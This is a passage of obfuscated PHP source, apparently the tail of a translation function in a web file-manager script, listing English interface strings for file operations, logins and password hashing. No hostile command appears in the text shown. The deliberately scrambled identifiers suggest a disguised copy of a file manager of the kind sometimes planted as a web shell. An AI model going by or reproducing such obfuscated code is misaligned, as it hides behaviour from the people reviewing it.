Folder';$k276['en']['Files']='Files';$k276['en']['Move']='Move';$k276['en']['Change']='Change';$k276['en']['Settings']='Settings';$k276['en']['Language']='Language';$k276['en']['ErrorReporting']='Error Reporting';$k276['en']['ShowHiddenFiles']='Show Hidden Files';$k276['en']['Help']='Help';$k276['en']['Created']='Created';$k276['en']['Help Documents']='Help Documents';$k276['en']['Report Issue']='Report Issue';$k276['en']['Generate']='Generate';$k276['en']['FullSize']='Full Size';$k276['en']['HideColumns']='Hide Perms/Owner columns';$k276['en']['You are logged in']='You are logged in';$k276['en']['Nothing selected']='Nothing selected';$k276['en']['Paths must be not equal']='Paths must be not equal';$k276['en']['Renamed from']='Renamed from';$k276['en']['Archive not unpacked']='Archive not unpacked';$k276['en']['Deleted']='Deleted';$k276['en']['Archive not created']='Archive not created';$k276['en']['Copied from']='Copied from';$k276['en']['Permissions changed']='Permissions changed';$k276['en']['to']='to';$k276['en']['Saved Successfully']='Saved Successfully';$k276['en']['not found!']='not found!';$k276['en']['File Saved Successfully']='File Saved Successfully';$k276['en']['Archive']='Archive';$k276['en']['Permissions not changed']='Permissions not changed';$k276['en']['Select folder']='Select folder';$k276['en']['Source path not defined']='Source path not defined';$k276['en']['already exists']='already exists';$k276['en']['Error while moving from']='Error while moving from';$k276['en']['Create archive?']='Create archive?';$k276['en']['Invalid file or folder name']='Invalid file or folder name';$k276['en']['Archive unpacked']='Archive unpacked';$k276['en']['File extension is not allowed']='File extension is not allowed';$k276['en']['Root path']='Root path';$k276['en']['Error while renaming from']='Error while renaming from';$k276['en']['File not found']='File not found';$k276['en']['Error while deleting items']='Error while deleting items';$k276['en']['Moved from']='Moved from';$k276['en']['Generate new password hash']='Generate new password hash';$k276['en']['Login failed. Invalid username or password']='Login failed. Invalid username or password';$k276['en']['password_hash not supported, Upgrade PHP version']='password_hash not supported, Upgrade PHP version';$k276['en']['Advanced Search']='Advanced Search';$k276['en']['Error while copying from']='Error while copying from';$k276['en']['Invalid characters in file name']='Invalid characters in file name';$k276['en']['FILE EXTENSION HAS NOT SUPPORTED']='FILE EXTENSION HAS NOT SUPPORTED';$k276['en']['Selected files and folder deleted']='Selected files and folder deleted';$k276['en']['Error while fetching archive info']='Error while fetching archive info';$k276['en']['Delete selected files and folders?']='Delete selected files and folders?';$k276['en']['Search file in folder and subfolders...']='Search file in folder and subfolders...';$k276['en']['Access denied. IP restriction applicable']='Access denied. IP restriction applicable';$k276['en']['Invalid characters in file or folder name']='Invalid characters in file or folder name';$k276['en']['Operations with archives are not available']='Operations with archives are not available';$k276['en']['File or folder with this path already exists']='File or folder with this path already exists';$k358=b22($k276);$k276=$k358?$k358:$k276;if(!strlen($x89))$x89='en';if(isset($k276[$x89][$v357]))return w27($k276[$x89][$v357]);else if(isset($k276['en'][$v357]))return w27($k276['en'][$v357]);else return"$v357";}?>